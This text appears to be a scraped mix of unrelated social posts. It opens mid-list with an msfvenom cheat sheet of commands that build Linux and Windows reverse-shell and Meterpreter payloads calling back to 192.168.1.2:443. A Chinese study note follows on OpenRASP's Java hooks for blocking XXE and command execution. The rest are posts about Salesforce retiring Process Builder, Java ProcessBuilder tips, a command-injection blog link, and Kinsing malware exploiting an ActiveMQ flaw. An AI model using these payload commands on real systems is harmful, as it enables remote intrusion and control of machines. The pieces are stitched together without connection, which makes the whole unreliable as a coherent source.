bash msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf Listener Metasploit Multi Handler **x86 - Meterpreter:** bash msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf **x64 - Meterpreter:** bash msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf **x86 - Shell:** bash msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf **x64 - Shell:** bash msfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf Windows Payloads Listener Netcat **x86 - Shell:** bash msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe **x64 - Shell:** bash msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe Listener Metasploit Multi Handler **x86 - Meterpreter:** bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe **x64 - Meterpreter:** bash msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe **x86 - Shell:** bash msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe **x64 - Shell:** bash msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe ████████████████████████

#开源代码分析 记录一下今天学习到的OpenRASP代码分析（这个是国内RASP产品的鼻祖）： - Agent.java ： - premain()：在Java程序启动时加载 Agent，或者attach 到已经运行的Java进程，执行init方法（以便能编织代码）。 - agentmain()：使用Java Instrumentation机制attach到已经运行的Java进程，执行init方法（以便能编织代码）。 - HttpAppender.java： - 实现了一个日志上传Appender，用于将日志信息上传到云端（如S3，SLS） - KeepAlive.java： - 创建心跳线程，保持本地RASP（Runtime Application Self-Protection）与云控制中心的连接。 - Register.java： - 代码向基于云的服务注册 RASP 代理，提供有关代理的必要信息，例如其 ID、版本、主机名、操作系统、语言和其他环境详细信息。 - detector目录（扫描规则，用于组件供应链信息收集）： - DubboDetector.java ：检测类名是否匹配 Dubbo 的GenericFilter类，是则记录个日志，标注Dubbo。 - 其他如Jetty、resin等都一样。 - hook目录（扫描规则，用于函数拦截与识别）： - DubboPreRequestHook.java ： 该代码定义了一个用于Dubbo请求预处理的钩子点。 Dubbo 是一个流行的开源 RPC 框架，该钩子允许在请求发送到 Dubbo 框架之前拦截和处理请求。 - 其他文件也一样：文件操作等函数之前，可以植入代码。 - 常用的2种拦截： - 拦截到类：`hookMethod` 方法负责修改匹配类的行为。 - 拦截到方法：`hookMethod` 方法负责修改匹配类的行为。 - 安全漏洞拦截，如XXE为例： - 检查类名是否匹配：在 `isClassMatched` 方法中，检查当前类名是否为 "org/dom4j/io/SAXReader"，如果是，则进行下一步。Hook 方法：在 `hookMethod` 方法中， Hook 了 SAXReader 的 read 方法，並在其前插入了一段代码，用于设置 Dom4j 的XXE entity。设置XXE entity：在 `setFeature` 方法中，检查当前线程是否启用Hook，且当前 action 为 BLOCK_XXE_DISABLE_ENTITY，如果满足条件，則使用反射机制调用 reader 的 setFeature 方法，禁用 XXE entity。错误处理：如果在禁用 XXE entity的过程中出现错误，则记录警告日志。 - 安全漏洞拦截，如RCE为例：`ProcessBuilderHook` 类扩展了 `AbstractClassHook` 并重写了几个方法来挂钩到 `ProcessBuilder` 类；`isClassMatched` 方法根据 Java 版本和操作系统检查当前类是否为 `java/lang/ProcessImpl` 或 `java/lang/UNIXProcess`。`hookMethod` 方法在 `ProcessBuilder` 类初始化之前注入对 `checkCommand` 方法的方法调用。checkCommand 方法从 byte[] 或 String[] 参数中提取命令信息，包括命令参数和环境变量。然后将提取的命令信息传递给另一个 `checkCommand` 方法，该方法对命令信息进行检查。最后的“checkCommand”方法使用提取的命令信息创建参数映射，并使用“HookHandler.doCheckWithoutRequest”方法执行检查。 - 开源项目中还有对PHP的RASP（主要用.cc实现），以及RASP-cloud实现（主要用golang实现），此处略。 开源地址：github.com/baidu/openrasp

Salesforce has announced a significant change to its automation tools: The end of support for Workflow Rules and Process Builder starting December 31, 2025. Customers are urged to switch their automation to Salesforce Flow.🧵 #flow #automation #processbuilder #salesforce

The newest #TheFlowArchitect is live! Earlier this week, Salesforce highlighted the end of support for #WorkflowRules and #ProcessBuilder. In this post I discuss what this means for #AwesomeAdmins. #Salesforce #Trailblazers #TrailblazerCommunity #Flow #Flownatics #GoWithTheFlow

Checkout @sickuritywizard latest blog on how Java's ProcessBuilder and Runtime classes can unwittingly open the door to Command Injection Vulnerabilities. infosecwriteups.com/unveilin… #bugbountytips #bugbounty

🚀 Java Tip🚀 Java's Process API provides better control over operating system processes. ProcessBuilder pb = new ProcessBuilder("app.exe"); Process process = pb.start(); docs.oracle.com/en/java/java… #Java

i am a beginner programmer and the fact you have to make new object processbuilder, then manually call inheritid function and then call start is cursed. why cant they just... C?

Kinsingマルウェア集団が、Apache ActiveMQの遠隔コード実行脆弱性(CVE-2023-46604)を使用しルートキットを仕込んでいる。トレンドマイクロ社報告。"ProcessBuilder"から悪意あるbashスクリプトで追加のペイロードをダウンロード。 bleepingcomputer.com/news/se…